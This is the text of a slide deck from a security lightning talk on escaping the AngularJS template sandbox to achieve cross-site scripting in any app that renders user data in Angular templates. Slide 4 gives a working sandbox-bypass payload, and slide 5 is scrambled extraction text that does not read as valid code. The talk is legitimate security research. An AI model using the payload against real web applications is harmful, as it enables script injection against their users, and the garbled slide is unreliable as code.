Breaking AngularJS Javascript sandbox


Published on

Lightning talk by avlidienburnn on how to break AngularJS sandbox and more or less XSS every AngularJS app out there (slight e

Published in: Internet
  • Be the first to comment

Breaking AngularJS Javascript sandbox

  1. 1. Breaking ngularJS Javascript sandbox A lightning talk by avlidienbrunn
  2. 2. What is AngularJS? And where’s the sandbox? • Javascript framework for building single page web applications. • Mustache style templates: Having <h1>{{1+2+3}}</h1> anywhere in Angular HTML app will render <h1>6</h1> • Template expressions are evaluated with Javascript • Template expression Javascript is sandboxed - It can’t reach [object Window] or DOM • If we could access dangerous objects from templates, we could XSS any AngularJS app that prints user data in Angular bound HTML
  3. 3. Executing JS… From JS • eval() - Unavailable under window • document.write - Unavailable under document • location=“javascript:” - Unavailable under document • Function(“code”)() - Unavailable under blacklist • What else is there?
  4. 4. The bypass toString.constructor.prototype.toString=; [“a”,"alert(1)"].sort(toString.constructor) alert(1)
  5. 5. The how if(if((toString.Function("compareFunction(function(constructor.a){a", alert("alert(1)}) 1)}).element1, 1)") prototype.== toString() == 1){ 1){ element2) toString= == 1..toString()){ == 1){ toString.//{{sort toString.element bigger; toString= }else if((function(["if(… a","toString.alert(== a){0){ 1)"].alert(constructor.sort(1)}).Function); call() prototype.== 1..toString()){ call; //sort element as same }else{ //sort element as smaller } //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller } toString.constructor); [“a”,”alert(1)”].sort(toString.constructor)}} alert(1)
  6. 6. That’s all folks! + = A lightning talk by avlidienbrunn